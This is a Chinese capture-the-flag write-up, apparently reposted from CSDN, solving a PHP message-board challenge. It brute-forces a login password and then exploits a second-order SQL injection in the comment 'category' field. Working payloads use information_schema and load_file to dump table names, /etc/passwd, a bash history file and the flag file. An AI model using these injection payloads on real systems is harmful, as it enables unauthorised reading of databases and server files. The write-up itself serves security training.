本文共 2583 字,大约阅读时间需要 8 分钟。
mysql.php
???访问好像没啥子用 以后再说session
必须等于yes
才能操作login.php
有个小提示 str_a='123456789abcdefghijklmnopqrstuvwxzy'for i in str_a: for j in str_a: for k in str_a: print(i+j+k)
zhangwei666
do_login.php
不完整 附上大师傅的源码0){ $category = mysql_fetch_array($result)['category']; $content = addslashes($_POST['content']); $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'"; $result = mysql_query($sql); } header("Location: ./comment.php?id=$bo_id"); break;default: header("Location: ./index.php");}}else{ header("Location: ./index.php");}?>————————————————//版权声明:本文为CSDN博主「HyyMbb」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。//原文链接:https://blog.csdn.net/a3320315/article/details/104216070
category
填写的注入语句和comment中填写的content
内容comment
直接将category
的数据取出,没有经过任何的过滤操作addslashes($_POST['category'])
处理,所以我们可以在这里花点心思$content = addslashes($_POST['content']); $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'";
我们在发帖的时候
TITLE:database CATEGORY:123’,content=database(),/* CONTENT:123 在提交留言处写入 */#
$content = addslashes($_POST['content']); $sql = "insert into comment set category = '123',content=database(),/*', content = '*/#', bo_id = '$bo_id'";
insert into comment set category = '123',content=database(),/*', content = '*/#', bo_id = '$bo_id'";
123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
board,comment,user
123',content=(select (load_file('/etc/passwd'))),/*
insert into comment set category = '123',content=(select (load_file('/etc/passwd'))),/*', content = '*/#', bo_id = '$bo_id'";
123',content=(select (load_file('/home/www/.bash_history'))),/*
123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
flag_8946e1ff1ee3e40f.php
123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*